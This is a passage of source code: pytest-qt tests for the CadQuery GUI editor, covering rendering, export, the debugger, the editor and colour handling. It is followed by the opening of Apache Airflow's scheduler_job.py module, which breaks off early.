    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that cq.Shape object was rendered using explicit show_object call
    editor.set_text(code_show_Shape)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)

    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # test rendering via console
    console.execute(code_show_Workplane)
    assert(obj_tree_comp.CQ.childCount() == 1)

    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    console.execute(code_show_Shape)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # check object rendering using show_object call with a name specified and
    # debug call
    editor.set_text(code_show_Workplane_named)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(100)
    assert(obj_tree_comp.CQ.child(0).text(0) == 'test')
    assert('test' in log.toPlainText().splitlines()[-1])
def test_export(main,mocker):
    """Exporting the selected object writes STL and STEP files to disk."""
    qtbot, win = main

    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    #set focus
    obj_tree = win.components['object_tree'].tree
    obj_tree_comp = win.components['object_tree']
    qtbot.mouseClick(obj_tree, Qt.LeftButton)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Down)

    #export STL
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.stl',''))
    obj_tree_comp._export_STL_action.triggered.emit()
    assert(os.path.isfile('out.stl'))

    #export STEP
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
    obj_tree_comp._export_STEP_action.triggered.emit()
    assert(os.path.isfile('out.step'))

    #clean
    os.remove('out.step')
    os.remove('out.stl')
def number_visible_items(viewer):
    """Count the AIS objects currently displayed in *viewer*'s context."""
    from OCP.AIS import AIS_ListOfInteractive

    displayed = AIS_ListOfInteractive()
    viewer._get_context().DisplayedObjects(displayed)
    return displayed.Extent()
def test_inspect(main):
    """The CQ object inspector lists the modelling stack and drives what the
    viewer displays."""
    qtbot, win = main

    #set focus and make invisible
    obj_tree = win.components['object_tree'].tree
    qtbot.mouseClick(obj_tree, Qt.LeftButton)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Down)
    qtbot.keyClick(obj_tree, Qt.Key_Space)

    #enable object inspector
    insp = win.components['cq_object_inspector']
    insp._toolbar_actions[0].toggled.emit(True)

    #check if all stack items are visible in the tree
    assert(insp.root.childCount() == 3)

    #check if correct number of items is displayed
    viewer = win.components['viewer']
    insp.setCurrentItem(insp.root.child(0))
    assert(number_visible_items(viewer) == 4)

    insp.setCurrentItem(insp.root.child(1))
    assert(number_visible_items(viewer) == 7)

    insp.setCurrentItem(insp.root.child(2))
    assert(number_visible_items(viewer) == 4)

    insp._toolbar_actions[0].toggled.emit(False)
    assert(number_visible_items(viewer) == 3)
def test_debug(main,mocker):
    """Exercise step/continue/breakpoint behaviour of the debugger component.

    The debugger's inner Qt event loop is replaced with a mock that runs a
    scripted list of callbacks, one per debugger pause.
    """
    # store the tracing function
    trace_function = sys.gettrace()

    class event_loop(object):
        '''Used to mock the QEventLoop for the debugger component
        '''

        def __init__(self,callbacks):
            self.callbacks = callbacks
            self.i = 0

        def exec_(self):
            # run the next scripted callback instead of blocking
            if self.i<len(self.callbacks):
                self.callbacks[self.i]()
                self.i+=1

        def exit(self,*args):
            pass

    def assert_func(x):
        '''Needed to perform asserts in lambdas
        '''
        assert(x)

    def patch_debugger(debugger,event_loop_mock):
        # splice the mocked event loop into the debugger
        debugger.inner_event_loop.exec_ = event_loop_mock.exec_
        debugger.inner_event_loop.exit = event_loop_mock.exit

    qtbot, win = main

    #clear all
    obj_tree = win.components['object_tree']
    obj_tree.toolbarActions()[0].triggered.emit()

    editor = win.components['editor']
    editor.set_text(code)

    debugger = win.components['debugger']
    actions = debugger._actions['Run']
    run,debug,step,step_in,cont = actions

    variables = win.components['variables_viewer']

    viewer = win.components['viewer']
    assert(number_visible_items(viewer) == 3)

    #check breakpoints
    assert(debugger.breakpoints == [])

    #check _frames
    assert(debugger._frames == [])

    #test step through
    ev = event_loop([lambda: (assert_func(variables.model().rowCount() == 4),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 4),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 3),
                              step.triggered.emit()),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit())])

    patch_debugger(debugger,ev)

    debug.triggered.emit(True)

    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)

    #test exit debug
    ev = event_loop([lambda: (step.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 1),
                              assert_func(number_visible_items(viewer) == 3),
                              debug.triggered.emit(False),)])

    patch_debugger(debugger,ev)

    debug.triggered.emit(True)

    assert(variables.model().rowCount() == 1)
    assert(number_visible_items(viewer) == 3)

    #test breakpoint
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])

    patch_debugger(debugger,ev)

    editor.debugger.set_breakpoints([(4,None)])

    debug.triggered.emit(True)

    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)

    #test breakpoint without using signals
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])

    patch_debugger(debugger,ev)

    editor.debugger.set_breakpoints([(4,None)])

    debugger.debug(True)

    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)

    #test debug() without using signals
    ev = event_loop([lambda: (cont.triggered.emit(),),
                     lambda: (assert_func(variables.model().rowCount() == 5),
                              assert_func(number_visible_items(viewer) == 4),
                              cont.triggered.emit(),)])

    patch_debugger(debugger,ev)

    editor.set_text(code_debug_Workplane)
    editor.debugger.set_breakpoints([(4,None)])

    debugger.debug(True)

    CQ = obj_tree.CQ

    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == pytest.approx(0.2) )
    assert( r == 1.0 )

    assert(variables.model().rowCount() == 2)
    assert(number_visible_items(viewer) == 4)

    # restore the tracing function
    sys.settrace(trace_function)
# Script with a syntax error (unclosed parenthesis on line 2)
code_err1 = \
'''import cadquery as cq
(
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
'''

# Script that raises a NameError at runtime (f is undefined)
code_err2 = \
'''import cadquery as cq
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
f()
'''
def test_traceback(main):
    """Syntax and runtime errors must appear in the traceback viewer."""
    # store the tracing function
    trace_function = sys.gettrace()

    qtbot, win = main

    editor = win.components['editor']
    debugger = win.components['debugger']
    traceback_view = win.components['traceback_viewer']

    actions = debugger._actions['Run']
    run,debug,step,step_in,cont = actions

    editor.set_text(code_err1)
    run.triggered.emit()

    assert('SyntaxError' in traceback_view.current_exception.text())

    debug.triggered.emit()

    assert('SyntaxError' in traceback_view.current_exception.text())
    # debugging a broken script must not leave the debug action toggled
    assert(debug.isChecked() == False)

    editor.set_text(code_err2)
    run.triggered.emit()

    assert('NameError' in traceback_view.current_exception.text())

    # restore the tracing function
    sys.settrace(trace_function)
@pytest.fixture
def editor(qtbot):
    """Provide a shown, qtbot-managed Editor widget as ``(qtbot, editor)``."""
    win = Editor()
    win.show()

    qtbot.addWidget(win)

    return qtbot, win
def conv_line_ends(text):
    """Normalize all line endings in *text* to LF (drops a trailing newline)."""
    lines = text.splitlines()
    return '\n'.join(lines)
def test_editor(monkeypatch,editor):
    """File load/save/open/save-as and component-state persistence."""
    qtbot, editor = editor

    with open('test.py','w') as f:
        f.write(code)

    #check that no text is present
    assert(editor.get_text_with_eol() == '')

    #check that loading from file works properly
    editor.load_from_file('test.py')
    assert(len(editor.get_text_with_eol()) > 0)
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    #check that creating a new document clears the text
    editor.new()
    assert(editor.get_text_with_eol() == '')

    #monkeypatch QFileDialog methods
    def filename(*args, **kwargs):
        return 'test.py',None

    def filename2(*args, **kwargs):
        return 'test2.py',None

    monkeypatch.setattr(QFileDialog, 'getOpenFileName',
                        staticmethod(filename))
    monkeypatch.setattr(QFileDialog, 'getSaveFileName',
                        staticmethod(filename2))

    #check that open file works properly
    editor.open()
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    #check that save file works properly
    editor.new()
    qtbot.mouseClick(editor, Qt.LeftButton)
    qtbot.keyClick(editor,Qt.Key_A)
    assert(editor.document().isModified() == True)
    editor.filename = 'test2.py'
    editor.save()
    assert(editor.document().isModified() == False)

    monkeypatch.setattr(QFileDialog, 'getOpenFileName',
                        staticmethod(filename2))

    editor.open()
    assert(editor.get_text_with_eol() == 'a')

    #check that save as works properly
    os.remove('test2.py')
    editor.save_as()
    assert(os.path.exists(filename2()[0]))

    #test persistence
    settings = QSettings('test')
    editor.saveComponentState(settings)

    editor.new()
    assert(editor.get_text_with_eol() == '')

    editor.restoreComponentState(settings)
    assert(editor.get_text_with_eol() == 'a')

    #test error handling (restoring state pointing at a missing file)
    os.remove('test2.py')
    assert(not os.path.exists('test2.py'))
    editor.restoreComponentState(settings)
@pytest.mark.repeat(1)
def test_editor_autoreload(monkeypatch,editor):
    """Re-render triggering on external file changes with autoreload on/off."""
    qtbot, editor = editor

    TIMEOUT = 500

    # start out with autoreload enabled
    editor.autoreload(True)

    with open('test.py','w') as f:
        f.write(code)

    assert(editor.get_text_with_eol() == '')

    editor.load_from_file('test.py')
    assert(len(editor.get_text_with_eol()) > 0)

    # wait for reload.
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        # modify file - NB: separate process is needed to avoid Windows quirks
        modify_file(code_bigger_object)

    # check that editor has updated file contents
    assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())

    # disable autoreload
    editor.autoreload(False)

    # Wait for reload in case it incorrectly happens. A timeout should occur
    # instead because a re-render should not be triggered with autoreload
    # disabled.
    with pytest.raises(pytestqt.exceptions.TimeoutError):
        with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
            # re-write original file contents
            modify_file(code)

    # editor should continue showing old contents since autoreload is disabled.
    assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())

    # Saving a file with autoreload disabled should not trigger a rerender.
    with pytest.raises(pytestqt.exceptions.TimeoutError):
        with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
            editor.save()

    editor.autoreload(True)

    # Saving a file with autoreload enabled should trigger a rerender.
    with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
        editor.save()
def test_console(main):
    """Command execution and text output of the interactive console."""
    qtbot, win = main

    console = win.components['console']

    # test execute_command
    a = []
    console.push_vars({'a' : a})
    console.execute_command('a.append(1)')
    assert(len(a) == 1)

    # test print_text: the prompt must advance by the printed length
    pos_orig = console._prompt_pos
    console.print_text('a')
    assert(console._prompt_pos == pos_orig + len('a'))
def test_viewer(main):
    """Smoke test: trigger every 'View' action of the viewer component."""
    qtbot, win = main

    viewer = win.components['viewer']

    # There is no easy way to verify the resulting camera state, so simply
    # make sure that none of the 'View' actions raises.
    for action in viewer._actions['View']:
        action.trigger()
# Minimal module used to test importing from the script's directory
code_module = \
'''def dummy(): return True'''

# Script that imports the dummy module defined above
code_import = \
'''from module import dummy
assert(dummy())'''
def test_module_import(main):
    """Scripts must be able to import modules located next to them."""
    qtbot, win = main

    editor = win.components['editor']
    debugger = win.components['debugger']
    traceback_view = win.components['traceback_viewer']

    #save the dummy module
    with open('module.py','w') as f:
        f.write(code_module)

    #run the code importing this module
    editor.set_text(code_import)
    debugger._actions['Run'][0].triggered.emit()

    #verify that no exception was generated
    assert(traceback_view.current_exception.text() == '')
def test_auto_fit_view(main_clean):
    """Automatic camera fitting on first render, object removal and settings."""

    def concat(eye,proj,scale):
        """Combine camera eye/projection/scale into one comparable tuple."""
        return eye+proj+(scale,)

    def approx_view_properties(eye,proj,scale):
        """Like concat() but wrapped in pytest.approx for fuzzy comparison."""
        return pytest.approx(eye+proj+(scale,))

    qtbot, win = main_clean

    editor = win.components['editor']
    debugger = win.components['debugger']
    viewer = win.components['viewer']
    object_tree = win.components['object_tree']

    view = viewer.canvas.view
    viewer.preferences['Fit automatically'] = False
    eye0,proj0,scale0 = view.Eye(),view.Proj(),view.Scale()

    # check if camera position is adjusted automatically when rendering for the
    # first time
    debugger.render()
    eye1,proj1,scale1 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye0,proj0,scale0) != \
        approx_view_properties(eye1,proj1,scale1) )

    # check if camera position is not changed after code change
    editor.set_text(code_bigger_object)
    debugger.render()
    eye2,proj2,scale2 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye1,proj1,scale1) == \
        approx_view_properties(eye2,proj2,scale2) )

    # check if position is adjusted automatically after erasing all objects
    object_tree.removeObjects()
    debugger.render()
    eye3,proj3,scale3 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye2,proj2,scale2) != \
        approx_view_properties(eye3,proj3,scale3) )

    # check if position is adjusted automatically if settings are changed
    viewer.preferences['Fit automatically'] = True
    editor.set_text(code)
    debugger.render()
    eye4,proj4,scale4 = view.Eye(),view.Proj(),view.Scale()
    assert( concat(eye3,proj3,scale3) != \
        approx_view_properties(eye4,proj4,scale4) )
def test_preserve_properties(main):
    """Visibility/color/alpha must survive a re-render when the option is on."""
    qtbot, win = main

    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    object_tree = win.components['object_tree']
    object_tree.preferences['Preserve properties on reload'] = True

    # change the rendered object's display properties
    assert(object_tree.CQ.childCount() == 1)
    props = object_tree.CQ.child(0).properties
    props['Visible'] = False
    props['Color'] = '#caffee'
    props['Alpha'] = 0.5

    # re-render and check that the properties were preserved
    debugger._actions['Run'][0].triggered.emit()

    assert(object_tree.CQ.childCount() == 1)
    props = object_tree.CQ.child(0).properties
    assert(props['Visible'] == False)
    assert(props['Color'].name() == '#caffee')
    assert(props['Alpha'] == 0.5)
def test_selection(main_multi,mocker):
    """Selection-dependent STEP export and viewer/object-tree synchronisation."""
    qtbot, win = main_multi

    viewer = win.components['viewer']
    object_tree = win.components['object_tree']

    CQ = object_tree.CQ
    obj1 = CQ.child(0)
    obj2 = CQ.child(1)

    # export with two selected objects
    obj1.setSelected(True)
    obj2.setSelected(True)

    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 2)

    # export with one selected object
    obj2.setSelected(False)

    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 1)

    # export with the root (CQ) item selected - exports everything
    obj1.setSelected(False)
    CQ.setSelected(True)

    object_tree._export_STEP_action.triggered.emit()
    imported = cq.importers.importStep('out.step')
    assert(len(imported.solids().vals()) == 2)

    # check if viewer and object tree are properly connected
    CQ.setSelected(False)
    obj1.setSelected(True)
    obj2.setSelected(True)

    ctx = viewer._get_context()
    ctx.InitSelected()
    shapes = []

    while ctx.MoreSelected():
        shapes.append(ctx.SelectedShape())
        ctx.NextSelected()

    assert(len(shapes) == 2)

    # clicking empty space in the viewer clears the tree selection
    viewer.fit()
    qtbot.mouseClick(viewer.canvas, Qt.LeftButton)
    assert(len(object_tree.tree.selectedItems()) == 0)

    viewer.sigObjectSelected.emit([obj1.shape_display.wrapped])
    assert(len(object_tree.tree.selectedItems()) == 1)

    # go through different handleSelection paths
    qtbot.mouseClick(object_tree.tree, Qt.LeftButton)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)
    qtbot.keyClick(object_tree.tree, Qt.Key_Down)

    # with a non-object item current, all object actions must be disabled
    assert(object_tree._export_STL_action.isEnabled() == False)
    assert(object_tree._export_STEP_action.isEnabled() == False)
    assert(object_tree._clear_current_action.isEnabled() == False)
    assert(object_tree.properties_editor.isEnabled() == False)
def test_closing(main_clean_do_not_close):
    """Window must refuse to close while the editor has unsaved changes."""
    qtbot,win = main_clean_do_not_close

    editor = win.components['editor']

    # make sure that the window is visible
    assert(win.isVisible())

    # should not quit (editor is modified)
    win.close()
    assert(win.isVisible())

    # should quit
    editor.reset_modified()
    win.close()
    assert(not win.isVisible())
def test_check_for_updates(main,mocker):
    """Update-check message box depends on the installed cadquery version."""
    qtbot,win = main

    # patch requests so the GitHub releases query returns a fixed tag
    import requests
    mocker.patch.object(requests.models.Response,'json',
                        return_value=[{'tag_name' : '0.0.2','draft' : False}])

    # stub QMessageBox about
    about_stub = mocker.stub()
    mocker.patch.object(QMessageBox, 'about', about_stub)

    import cadquery
    cadquery.__version__ = '0.0.1'

    win.check_for_cq_updates()
    assert(about_stub.call_args[0][1] == 'Updates available')

    cadquery.__version__ = '0.0.3'

    win.check_for_cq_updates()
    assert(about_stub.call_args[0][1] == 'No updates available')
@pytest.mark.skipif(sys.platform.startswith('linux'),reason='Segfault workaround for linux')
def test_screenshot(main,mocker):
    """The screenshot tool must write the requested PNG file."""
    qtbot,win = main

    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.png',''))

    viewer = win.components['viewer']
    viewer._actions['Tools'][0].triggered.emit()

    assert(os.path.exists('out.png'))
def test_resize(main):
    """Smoke test: hiding and re-showing the editor must not raise."""
    qtbot,win = main
    editor = win.components['editor']

    editor.hide()
    qtbot.wait(50)

    editor.show()
    qtbot.wait(50)
# Script that loads a STEP file via a path relative to the script itself
code_simple_step = \
'''import cadquery as cq
imported = cq.importers.importStep('shape.step')
'''
def test_relative_references(main):
    """Relative paths in a script resolve against the script's directory."""
    # create code with a relative reference in a subdirectory
    p = Path('test_relative_references')
    p.mkdir_p()
    p_code = p.joinpath('code.py')
    p_code.write_text(code_simple_step)

    # create the referenced step file
    shape = cq.Workplane("XY").box(1, 1, 1)
    p_step = p.joinpath('shape.step')
    export(shape, "step", p_step)

    # open code
    qtbot, win = main
    editor = win.components['editor']
    editor.load_from_file(p_code)

    # render
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    # assert no errors
    traceback_view = win.components['traceback_viewer']
    assert(traceback_view.current_exception.text() == '')

    # assert one object has been rendered
    obj_tree_comp = win.components['object_tree']
    assert(obj_tree_comp.CQ.childCount() == 1)

    # clean up
    p_code.remove_p()
    p_step.remove_p()
    p.rmdir_p()
# Script exercising all supported color specifications of show_object;
# the last entry uses an invalid format and must produce a log warning
code_color = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result, name ='1')
show_object(result, name ='2', options=dict(alpha=0.5,color='red'))
show_object(result, name ='3', options=dict(alpha=0.5,color='#ff0000'))
show_object(result, name ='4', options=dict(alpha=0.5,color=(255,0,0)))
show_object(result, name ='5', options=dict(alpha=0.5,color=(1.,0,0)))
show_object(result, name ='6', options=dict(rgba=(1.,0,0,.5)))
show_object(result, name ='7', options=dict(color=('ff','cc','dd')))
'''
def test_render_colors(main_clean):
    """Colors/alpha from show_object options are applied; bad formats logged."""
    qtbot, win = main_clean

    obj_tree = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    log = win.components['log']

    editor.set_text(code_color)
    debugger._actions['Run'][0].triggered.emit()

    CQ = obj_tree.CQ

    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == 0 )
    assert( r != 1.0 )

    # object 2
    r,g,b,a = get_rgba(CQ.child(1).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 3
    r,g,b,a = get_rgba(CQ.child(2).ais)
    assert( a == 0.5)
    assert( r == 1.0 )

    # object 4
    r,g,b,a = get_rgba(CQ.child(3).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 5
    r,g,b,a = get_rgba(CQ.child(4).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 6
    r,g,b,a = get_rgba(CQ.child(5).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # check if error occurred for the invalid color spec of object 7
    qtbot.wait(100)
    assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_render_colors_console(main_clean):
    """Same color handling as test_render_colors, but rendered via the console."""
    qtbot, win = main_clean

    obj_tree = win.components['object_tree']
    log = win.components['log']
    console = win.components['console']

    console.execute_command(code_color)

    def get_rgba(ais):
        """Return (r, g, b, alpha) of a console-rendered AIS object.

        Shadows the module-level helper; fixed to return the actual green
        and blue channels (it previously returned redF() for all three).
        """
        alpha = ais.Transparency()
        color = get_occ_color(ais)
        return color.redF(), color.greenF(), color.blueF(), alpha

    CQ = obj_tree.CQ

    # object 1 (default color)
    r,g,b,a = get_rgba(CQ.child(0).ais)
    assert( a == 0 )
    assert( r != 1.0 )

    # object 2
    r,g,b,a = get_rgba(CQ.child(1).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 3
    r,g,b,a = get_rgba(CQ.child(2).ais)
    assert( a == 0.5)
    assert( r == 1.0 )

    # object 4
    r,g,b,a = get_rgba(CQ.child(3).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 5
    r,g,b,a = get_rgba(CQ.child(4).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # object 6
    r,g,b,a = get_rgba(CQ.child(5).ais)
    assert( a == 0.5 )
    assert( r == 1.0 )

    # check if error occurred for the invalid color spec of object 7
    qtbot.wait(100)
    assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_confirm_new(monkeypatch,editor):
    """'New' must ask for confirmation when the document is modified."""
    qtbot, editor = editor

    #check that initial state is as expected
    assert(editor.modified == False)

    editor.document().setPlainText(code)
    assert(editor.modified == True)

    #monkeypatch the confirmation dialog and run both scenarios
    def cancel(*args, **kwargs):
        return QMessageBox.No

    def ok(*args, **kwargs):
        return QMessageBox.Yes

    monkeypatch.setattr(QMessageBox, 'question',
                        staticmethod(cancel))

    # declined confirmation: the document is kept
    editor.new()
    assert(editor.modified == True)
    assert(conv_line_ends(editor.get_text_with_eol()) == code)

    monkeypatch.setattr(QMessageBox, 'question',
                        staticmethod(ok))

    # accepted confirmation: the document is cleared
    editor.new()
    assert(editor.modified == False)
    assert(editor.get_text_with_eol() == '')
# Script that passes a raw TopoDS shape (wrapped OCCT object) to show_object
code_show_topods = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result.val().wrapped)
'''
def test_render_topods(main):
    """Raw TopoDS shapes render via show_object and via the console."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was rendered
    assert(obj_tree_comp.CQ.childCount() == 1)

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_topods)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering of topods object via console
    console.execute('show(result.val().wrapped)')
    assert(obj_tree_comp.CQ.childCount() == 2)

    # test rendering of list of topods object via console
    console.execute('show([result.val().wrapped,result.val().wrapped])')
    assert(obj_tree_comp.CQ.childCount() == 3)
# Script that shows a single Shape and a list of Shapes
code_show_shape_list = \
'''
import cadquery as cq
result1 = cq.Workplane("XY" ).box(1, 1, 1).val()
result2 = cq.Workplane("XY",origin=(0,1,1)).box(1, 1, 1).val()
show_object(result1)
show_object([result1,result2])
'''
def test_render_shape_list(main):
    """Shapes and lists of Shapes render via show_object and the console."""
    qtbot, win = main

    log = win.components['log']
    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_shape_list)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 2)

    # test rendering of Shape via console
    console.execute('show(result1)')
    console.execute('show([result1,result2])')
    assert(obj_tree_comp.CQ.childCount() == 4)

    # smoke test exception in show
    console.execute('show("a")')
# Script that shows a cadquery Assembly
code_show_assy = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
show_object(assy)
'''
def test_render_assy(main):
    """Assemblies render via show_object and via the console."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_assy)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering via console
    console.execute('show(assy)')
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 2)
# Script that shows a raw AIS interactive object built from an assembly
code_show_ais = \
'''import cadquery as cq
from cadquery.occ_impl.assembly import toCAF
import OCP
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
lab, doc = toCAF(assy)
ais = OCP.XCAFPrs.XCAFPrs_AISObject(lab)
show_object(ais)
'''
def test_render_ais(main):
    """Raw AIS objects render via show_object and via the console."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_ais)
    debugger._actions['Run'][0].triggered.emit()
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 1)

    # test rendering via console
    console.execute('show(ais)')
    qtbot.wait(500)
    assert(obj_tree_comp.CQ.childCount() == 2)
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.operators.dummy_operator import DummyOperator
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
# Shorthand aliases for the commonly queried ORM models
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
    """Runs DAG processing in a separate process using DagFileProcessor

    :param file_path: a Python file containing Airflow DAG definitions
    :type file_path: str
    :param pickle_dags: whether to serialize the DAG objects to the DB
    :type pickle_dags: bool
    :param dag_ids: If specified, only look at these DAG ID's
    :type dag_ids: List[str]
    :param failure_callback_requests: failure callback to execute
    :type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
    """

    # Counter that increments every time an instance of this class is created
    class_creation_counter = 0

    def __init__(
        self,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        failure_callback_requests: List[FailureCallbackRequest]
    ):
        super().__init__()
        self._file_path = file_path
        self._pickle_dags = pickle_dags
        self._dag_ids = dag_ids
        self._failure_callback_requests = failure_callback_requests

        # The process that was launched to process the given file.
        self._process: Optional[multiprocessing.process.BaseProcess] = None
        # The result of Scheduler.process_file(file_path).
        self._result: Optional[Tuple[List[dict], int]] = None
        # Whether the process is done running.
